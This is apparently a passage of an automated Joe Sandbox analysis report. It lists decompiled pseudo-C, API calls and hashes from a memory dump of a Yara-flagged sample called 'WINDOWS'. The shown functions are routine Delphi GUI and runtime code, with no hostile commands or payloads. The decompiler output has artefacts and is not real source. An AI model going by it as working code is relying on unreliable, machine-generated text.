                                                    0x0042ca3c
                                                    0x0042ca47
                                                    0x0042ca52
                                                    0x0042ca5c
                                                    0x0042ca5d
                                                    0x0042ca5e
                                                    0x0042ca5f
                                                    0x0042ca60
                                                    0x0042ca61
                                                    0x0042ca6b
                                                    0x0042ca6d
                                                    0x0042ca75
                                                    0x0042ca76
                                                    0x0042ca76
                                                    0x0042ca7b
                                                    0x0042ca7b
                                                    0x0042c9ec
                                                    0x0042c9f1
                                                    0x0042c9fe
                                                    0x0042ca0b
                                                    0x0042ca0b
                                                    0x0042ca85

                                                    APIs
                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042CA2C
                                                    • GetSystemMetrics.USER32 ref: 0042CA41
                                                    • GetSystemMetrics.USER32 ref: 0042CA4C
                                                    • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042CA76
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                    • String ID: DISPLAY$GetMonitorInfoW
                                                    • API String ID: 2545840971-2774842281
                                                    • Opcode ID: 25480e234fa7b0967a1bf53cae06218e6be674b0b36bcbe745a1c0771c571004
                                                    • Instruction ID: da6544c83ea616b7bbcbecc7cac92abfbfd15a320570470bed168d46318f2a96
                                                    • Opcode Fuzzy Hash: 25480e234fa7b0967a1bf53cae06218e6be674b0b36bcbe745a1c0771c571004
                                                    • Instruction Fuzzy Hash: D11103B1B413289FD760CF61AC84BAFB7A8FB06310F40493BE85597290D375A944CBA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00428F38 Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E00428F38(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				int _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				struct HDC__* _t18;
				int _t31;
				int _t34;
				intOrPtr _t41;
				void* _t43;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t16 = __eax;
				_t46 = _t48;
				_t49 = _t48 + 0xfffffbf0;
				_v8 = __edx;
				_t43 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L4:
					return _t16;
				} else {
					_t16 = E004267F4(_v8, 0xff,  &_v1044);
					_t34 = _t16;
					if(_t34 == 0) {
						goto L4;
					} else {
						_push(0);
						L00407638();
						_v12 = _t16;
						_t18 = _v12;
						_push(_t18);
						L004072E0();
						_v16 = _t18;
						_v20 = SelectObject(_v16, _t43);
						_push(_t46);
						_push(0x428fe7);
						_push( *[fs:eax]);
						 *[fs:eax] = _t49;
						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
						_pop(_t41);
						 *[fs:eax] = _t41;
						_push(0x428fee);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						_t31 = _v12;
						_push(_t31);
						_push(0);
						L00407888();
						return _t31;
					}
				}
			}

















                                                    0x00428f38
                                                    0x00428f39
                                                    0x00428f3b
                                                    0x00428f43
                                                    0x00428f46
                                                    0x00428f4a
                                                    0x00428fee
                                                    0x00428ff3
                                                    0x00428f5b
                                                    0x00428f69
                                                    0x00428f6e
                                                    0x00428f72
                                                    0x00000000
                                                    0x00428f74
                                                    0x00428f74
                                                    0x00428f76
                                                    0x00428f7b
                                                    0x00428f7e
                                                    0x00428f81
                                                    0x00428f82
                                                    0x00428f87
                                                    0x00428f94
                                                    0x00428f99
                                                    0x00428f9a
                                                    0x00428f9f
                                                    0x00428fa2
                                                    0x00428fb3
                                                    0x00428fba
                                                    0x00428fbd
                                                    0x00428fc0
                                                    0x00428fcd
                                                    0x00428fd6
                                                    0x00428fdb
                                                    0x00428fde
                                                    0x00428fdf
                                                    0x00428fe1
                                                    0x00428fe6
                                                    0x00428fe6
                                                    0x00428f72

                                                    APIs
                                                      • Part of subcall function 004267F4: GetObjectA.GDI32(?,00000004), ref: 0042680B
                                                      • Part of subcall function 004267F4: 733AAEA0.GDI32(?,00000000,?,?,?,00000004,?,000000FF,?,?,?,00428F6E), ref: 0042682E
                                                    • 733AAC50.USER32(00000000), ref: 00428F76
                                                    • 733AA590.GDI32(?,00000000), ref: 00428F82
                                                    • SelectObject.GDI32(?), ref: 00428F8F
                                                    • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00428FE7,?,?,?,?,00000000), ref: 00428FB3
                                                    • SelectObject.GDI32(?,?), ref: 00428FCD
                                                    • DeleteDC.GDI32(?), ref: 00428FD6
                                                    • 733AB380.USER32(00000000,?,?,?,?,00428FEE,?,00000000,00428FE7,?,?,?,?,00000000), ref: 00428FE1
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Object$Select$A590B380ColorDeleteTable
                                                    • String ID:
                                                    • API String ID: 980243606-0
                                                    • Opcode ID: a3d5f77fbad06867d513725d5eef4056ba0587fdc086a60eec88e5d63d0f1340
                                                    • Instruction ID: 4e07099c4c205c436fb256934ce996c76079a9fb80c20dbc0557a77875d025fb
                                                    • Opcode Fuzzy Hash: a3d5f77fbad06867d513725d5eef4056ba0587fdc086a60eec88e5d63d0f1340
                                                    • Instruction Fuzzy Hash: E8116671E052186BDB10EBE9DC41EAEB7BCEB08704F8144BAF904E7281DA789D40C765
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00458714 Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E00458714(long __eax, void* __ecx, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				void* _t21;
				struct HWND__* _t27;
				short _t28;
				void* _t30;
				struct tagPOINT* _t31;

				_t21 = __ecx;
				_t7 = __eax;
				_t31 = _t30 + 0xfffffff8;
				_t28 = __edx;
				_t19 = __eax;
				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
					L6:
					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
				} else {
					 *((short*)(__eax + 0x44)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E004586EC(_t19, _t28));
						goto L6;
					} else {
						GetCursorPos(_t31);
						_push(_v24.y);
						_t27 = WindowFromPoint(_v24);
						if(_t27 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t27, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t27, 0x20, _t27, E004079D0(SendMessageA(_t27, 0x84, 0, E00407A64(_t31, _t21)), 0x200));
							}
						}
					}
				}
				return _t7;
			}












                                                    0x00458714
                                                    0x00458714
                                                    0x00458718
                                                    0x0045871b
                                                    0x0045871d
                                                    0x00458723
                                                    0x00458798
                                                    0x00458798
                                                    0x00458725
                                                    0x00458725
                                                    0x0045872c
                                                    0x00458788
                                                    0x00458793
                                                    0x00000000
                                                    0x0045872e
                                                    0x0045872f
                                                    0x00458734
                                                    0x00458741
                                                    0x00458745
                                                    0x00000000
                                                    0x00458747
                                                    0x0045874a
                                                    0x00458758
                                                    0x00000000
                                                    0x0045875a
                                                    0x00458781
                                                    0x00458781
                                                    0x00458758
                                                    0x00458745
                                                    0x0045872c
                                                    0x004587a1

                                                    APIs
                                                    • GetCursorPos.USER32 ref: 0045872F
                                                    • WindowFromPoint.USER32(?,?), ref: 0045873C
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0045874A
                                                    • GetCurrentThreadId.KERNEL32 ref: 00458751
                                                    • SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 0045876A
                                                    • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00458781
                                                    • SetCursor.USER32(00000000), ref: 00458793
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                    • String ID:
                                                    • API String ID: 1770779139-0
                                                    • Opcode ID: 3b1cf324d5e8ab3e98f2e838186c1bf382b0abb02d5b530739333a6b4ef0cd78
                                                    • Instruction ID: 0e129d7b8b93cd0c48e49d674e41586019fec875b1cb266d62cfcabba037c031
                                                    • Opcode Fuzzy Hash: 3b1cf324d5e8ab3e98f2e838186c1bf382b0abb02d5b530739333a6b4ef0cd78
                                                    • Instruction Fuzzy Hash: D501AC2660830425E62036754C87F7F2558DF85B65F14453FBA04762C3ED3DAC05936E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00454268 Relevance: 9.2, APIs: 6, Instructions: 150COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 89%
                                                    			E00454268(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				struct tagRECT _v112;
				signed int _v116;
				long _v120;
				void* __ebp;
				void* _t68;
				void* _t94;
				struct HBRUSH__* _t97;
				intOrPtr _t105;
				void* _t118;
				void* _t127;
				intOrPtr _t140;
				intOrPtr _t146;
				void* _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				intOrPtr _t153;

				_t148 = __esi;
				_t147 = __edi;
				_t138 = __edx;
				_t127 = __ebx;
				_t150 = _t152;
				_t153 = _t152 + 0xffffff8c;
				_v12 = __edx;
				_v8 = __eax;
				_t68 =  *_v12 - 0xf;
				if(_t68 == 0) {
					_v16 =  *(_v12 + 4);
					if(_v16 == 0) {
						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
					}
					_push(_t150);
					_push(0x454436);
					_push( *[fs:eax]);
					 *[fs:eax] = _t153;
					if(_v16 == 0) {
						GetWindowRect( *(_v8 + 0x254),  &_v96);
						E0043AAC0(_v8,  &_v120,  &_v96);
						_v96.left = _v120;
						_v96.top = _v116;
						E004398B8( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
					}
					E0043F3B8(_v8, _t127, _v12, _t147, _t148);
					_pop(_t140);
					 *[fs:eax] = _t140;
					_push(0x454444);
					if(_v16 == 0) {
						return EndPaint( *(_v8 + 0x254),  &_v80);
					}
					return 0;
				} else {
					_t94 = _t68 - 5;
					if(_t94 == 0) {
						_t97 = E00425610( *((intOrPtr*)(_v8 + 0x170)));
						 *((intOrPtr*)( *_v8 + 0x44))();
						FillRect( *(_v12 + 4),  &_v112, _t97);
						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
							GetClientRect( *(_v8 + 0x254),  &_v96);
							FillRect( *(_v12 + 4),  &_v96, E00425610( *((intOrPtr*)(_v8 + 0x170))));
						}
						_t105 = _v12;
						 *((intOrPtr*)(_t105 + 0xc)) = 1;
					} else {
						_t118 = _t94 - 0x2b;
						if(_t118 == 0) {
							E004541DC(_t150);
							_t105 = _v8;
							if( *((char*)(_t105 + 0x22f)) == 2) {
								if(E00454704(_v8) == 0 || E00454228(_t138, _t150) == 0) {
									_t146 = 1;
								} else {
									_t146 = 0;
								}
								_t105 = E0045152C( *(_v8 + 0x254), _t146);
							}
						} else {
							if(_t118 != 0x45) {
								_t105 = E004541DC(_t150);
							} else {
								E004541DC(_t150);
								_t105 = _v12;
								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
									_t105 = _v12;
									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
								}
							}
						}
					}
					return _t105;
				}
			}

























                                                    0x00454268
                                                    0x00454268
                                                    0x00454268
                                                    0x00454268
                                                    0x00454269
                                                    0x0045426b
                                                    0x0045426e
                                                    0x00454271
                                                    0x00454279
                                                    0x0045427c
                                                    0x0045438c
                                                    0x00454393
                                                    0x004543ab
                                                    0x004543ab
                                                    0x004543b0
                                                    0x004543b1
                                                    0x004543b6
                                                    0x004543b9
                                                    0x004543c0
                                                    0x004543d0
                                                    0x004543de
                                                    0x004543e6
                                                    0x004543ec
                                                    0x004543ff
                                                    0x004543ff
                                                    0x0045440a
                                                    0x00454411
                                                    0x00454414
                                                    0x00454417
                                                    0x00454420
                                                    0x00000000
                                                    0x00454430
                                                    0x00454435
                                                    0x00454282
                                                    0x00454282
                                                    0x00454285
                                                    0x004542c5
                                                    0x004542d3
                                                    0x004542e1
                                                    0x004542f0
                                                    0x0045430c
                                                    0x0045432b
                                                    0x0045432b
                                                    0x00454330
                                                    0x00454333
                                                    0x00454287
                                                    0x00454287
                                                    0x0045428a
                                                    0x00454340
                                                    0x00454346
                                                    0x00454350
                                                    0x00454360
                                                    0x00454371
                                                    0x0045436d
                                                    0x0045436d
                                                    0x0045436d
                                                    0x0045437c
                                                    0x0045437c
                                                    0x00454290
                                                    0x00454293
                                                    0x0045443e
                                                    0x00454299
                                                    0x0045429a
                                                    0x004542a0
                                                    0x004542a7
                                                    0x004542ad
                                                    0x004542b0
                                                    0x004542b0
                                                    0x004542a7
                                                    0x00454293
                                                    0x0045428a
                                                    0x00454447
                                                    0x00454447

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                                    • String ID:
                                                    • API String ID: 901200654-0
                                                    • Opcode ID: 4b1a317fca31308ac4e10fac1f961552a80ef8e38a36b5d2d8db9195fd6bbfc6
                                                    • Instruction ID: 131b90634cb33abbaab8d9433d3d521d828b3d7b247f4d7e968007ff8c91c40e
                                                    • Opcode Fuzzy Hash: 4b1a317fca31308ac4e10fac1f961552a80ef8e38a36b5d2d8db9195fd6bbfc6
                                                    • Instruction Fuzzy Hash: 4651F075E04108EFCB00DB99C549E9DB7F8AB49319F5485A6E808EB352D738AE85DB08
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00410B94 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E00410B94(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E00410638(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040F328();
					return E00410638(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040F784();
						_t113 = _t54;
						if(_t113 == 0) {
							E00410390(_t100);
						}
						E004109E8(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E00410B08(_v788 - 1, _t115) != 0) {
								L0040F79C();
								E00410638(_v792);
								L0040F79C();
								E00410638( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E00410B38(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040F78C();
							E00410638(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040F794();
							E00410638(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























                                                    0x00410b94
                                                    0x00410ba0
                                                    0x00410ba6
                                                    0x00410ba8
                                                    0x00410bb2
                                                    0x00410bb9
                                                    0x00410bb9
                                                    0x00410bbe
                                                    0x00410bcc
                                                    0x00410d45
                                                    0x00410d4c
                                                    0x00410d4d
                                                    0x00000000
                                                    0x00410bd2
                                                    0x00410bd5
                                                    0x00410be7
                                                    0x00410bd7
                                                    0x00410bdc
                                                    0x00410bdc
                                                    0x00410bf6
                                                    0x00410c02
                                                    0x00410c05
                                                    0x00410c72
                                                    0x00410c78
                                                    0x00410c79
                                                    0x00410c7f
                                                    0x00410c80
                                                    0x00410c82
                                                    0x00410c87
                                                    0x00410c8b
                                                    0x00410c8d
                                                    0x00410c8d
                                                    0x00410c98
                                                    0x00410ca3
                                                    0x00410cae
                                                    0x00410cb7
                                                    0x00410cba
                                                    0x00410cd6
                                                    0x00410cdd
                                                    0x00410ce8
                                                    0x00410cff
                                                    0x00410d04
                                                    0x00410d18
                                                    0x00410d1d
                                                    0x00410d30
                                                    0x00410d30
                                                    0x00410d39
                                                    0x00410cbc
                                                    0x00410cbc
                                                    0x00410cbd
                                                    0x00410cc3
                                                    0x00410cc9
                                                    0x00410ccb
                                                    0x00410ccd
                                                    0x00410cd0
                                                    0x00410cd3
                                                    0x00410cd3
                                                    0x00410cd6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00410cd6
                                                    0x00410c07
                                                    0x00410c07
                                                    0x00410c08
                                                    0x00410c0a
                                                    0x00410c10
                                                    0x00410c12
                                                    0x00410c21
                                                    0x00410c22
                                                    0x00410c2c
                                                    0x00410c2d
                                                    0x00410c32
                                                    0x00410c3d
                                                    0x00410c3e
                                                    0x00410c48
                                                    0x00410c49
                                                    0x00410c4e
                                                    0x00410c69
                                                    0x00410c6b
                                                    0x00410c6c
                                                    0x00410c6f
                                                    0x00410c6f
                                                    0x00000000
                                                    0x00410c10
                                                    0x00410c05

                                                    APIs
                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00410C2D
                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00410C49
                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00410C82
                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410CFF
                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00410D18
                                                    • VariantCopy.OLEAUT32(?,00000000), ref: 00410D4D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                    • String ID:
                                                    • API String ID: 351091851-0
                                                    • Opcode ID: 186572999e7babe0e9bb68bc67f471013412e5678f21bde4cccaa072d4ecc509
                                                    • Instruction ID: 003888812708ca8383a4c1960096dd24bca7936a94d77342cebcc1c5295c8c4e
                                                    • Opcode Fuzzy Hash: 186572999e7babe0e9bb68bc67f471013412e5678f21bde4cccaa072d4ecc509
                                                    • Instruction Fuzzy Hash: 7551FE7590121D9FCB66DB59C981BD9B3BCAF4C304F4041EAE508E7202D678AFC58FA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041CE2C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E0041CE2C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				char _v12;
				char _v16;
				void* _t71;
				char _t72;
				char _t73;
				intOrPtr _t88;
				CHAR* _t91;
				CHAR** _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;

				_t96 = _t97;
				_t98 = _t97 + 0xfffffff4;
				_v16 = 0;
				_t71 = __edx;
				_v8 = __eax;
				_t94 =  &_v12;
				 *[fs:eax] = _t98;
				E0041BEF0(_v8);
				 *[fs:eax] = _t98;
				 *((intOrPtr*)( *_v8 + 0x44))( *[fs:eax], 0x41cf5e, _t96,  *[fs:eax], 0x41cf7b, _t96, __edi, __esi, __ebx, _t95);
				 *_t94 = E00404E80(_t71);
				while( *( *_t94) - 0xffffffffffffffe1 < 0) {
					 *_t94 = CharNextA( *_t94);
				}
				while(1) {
					_t72 =  *( *_t94);
					if(_t72 == 0) {
						break;
					}
					if(_t72 != E0041CFA4(_v8)) {
						_t91 =  *_t94;
						while(1) {
							_t73 =  *( *_t94);
							if(_t73 <= 0x20 || _t73 == E0041CF8C(_v8)) {
								break;
							}
							 *_t94 = CharNextA( *_t94);
						}
						E00404AB0( &_v16,  *_t94 - _t91, _t91);
					} else {
						E004091D4(_t94,  &_v16, E0041CFA4(_v8));
					}
					 *((intOrPtr*)( *_v8 + 0x38))();
					while( *( *_t94) - 0xffffffffffffffe1 < 0) {
						 *_t94 = CharNextA( *_t94);
					}
					if(E0041CF8C(_v8) ==  *( *_t94)) {
						if( *(CharNextA( *_t94)) == 0) {
							 *((intOrPtr*)( *_v8 + 0x38))();
						}
						do {
							 *_t94 = CharNextA( *_t94);
						} while ( *( *_t94) - 0xffffffffffffffe1 < 0);
					}
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E0041CF65);
				return E0041BFAC(_v8);
			}
















                                                    0x0041ce2d
                                                    0x0041ce2f
                                                    0x0041ce37
                                                    0x0041ce3a
                                                    0x0041ce3c
                                                    0x0041ce3f
                                                    0x0041ce4d
                                                    0x0041ce53
                                                    0x0041ce63
                                                    0x0041ce6b
                                                    0x0041ce75
                                                    0x0041ce83
                                                    0x0041ce81
                                                    0x0041ce81
                                                    0x0041cf3c
                                                    0x0041cf3e
                                                    0x0041cf42
                                                    0x00000000
                                                    0x00000000
                                                    0x0041ce9b
                                                    0x0041ceb3
                                                    0x0041cec1
                                                    0x0041cec3
                                                    0x0041cec8
                                                    0x00000000
                                                    0x00000000
                                                    0x0041cebf
                                                    0x0041cebf
                                                    0x0041cedf
                                                    0x0041ce9d
                                                    0x0041ceac
                                                    0x0041ceac
                                                    0x0041ceec
                                                    0x0041cefb
                                                    0x0041cef9
                                                    0x0041cef9
                                                    0x0041cf10
                                                    0x0041cf1d
                                                    0x0041cf26
                                                    0x0041cf26
                                                    0x0041cf29
                                                    0x0041cf31
                                                    0x0041cf38
                                                    0x0041cf29
                                                    0x0041cf10
                                                    0x0041cf4a
                                                    0x0041cf4d
                                                    0x0041cf50
                                                    0x0041cf5d

                                                    APIs
                                                    • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CE7C
                                                    • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CEF4
                                                    • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CF15
                                                    • CharNextA.USER32(00000000,?,?,00000000,0041CF7B), ref: 0041CF2C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CharNext
                                                    • String ID:
                                                    • API String ID: 3213498283-3916222277
                                                    • Opcode ID: 24b7eb0b41e4ee8e508986ba2351e00e2282b7539fe7d38dfc5498590e9056e5
                                                    • Instruction ID: 11efbd69cb5f73df2cbcf5fefe28e22a1c1bddc5dbaf51a38cd0fed122abd7e5
                                                    • Opcode Fuzzy Hash: 24b7eb0b41e4ee8e508986ba2351e00e2282b7539fe7d38dfc5498590e9056e5
                                                    • Instruction Fuzzy Hash: A1415130A44244DFCB11DF79C991999BBF6EF5A30472404AAF4C1D7392C738AD82DB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00426AA0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E00426AA0(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				signed short _v44;
				int _t36;
				signed int _t37;
				signed short _t38;
				signed int _t39;
				signed short _t43;
				signed int* _t47;
				signed int _t51;
				intOrPtr _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t68 = _t69;
				_t70 = _t69 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t47 = _a8;
				_v24 = _v16 << 4;
				_v20 = E00408D24(_v24, __eflags);
				 *[fs:edx] = _t70;
				_t51 = _v24;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x426d97, _t68, __edi, __esi, __ebx, _t67);
				if(( *_t47 | _t47[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t47;
					 *(_t36 + 4) = _t47[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_t36 = GetSystemMetrics(0xc);
					 *(_a4 + 4) = _t36;
				}
				_push(0);
				L00407638();
				_v44 = _t36;
				if(_v44 == 0) {
					E00425F64(_t51);
				}
				_push(_t68);
				_push(0x426b89);
				_push( *[fs:edx]);
				 *[fs:edx] = _t70;
				_push(0xe);
				_t37 = _v44;
				_push(_t37);
				L00407380();
				_push(0xc);
				_t38 = _v44;
				_push(_t38);
				L00407380();
				_t39 = _t37 * _t38;
				if(_t39 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t39;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(0x426b90);
				_t43 = _v44;
				_push(_t43);
				_push(0);
				L00407888();
				return _t43;
			}






















                                                    0x00426aa1
                                                    0x00426aa3
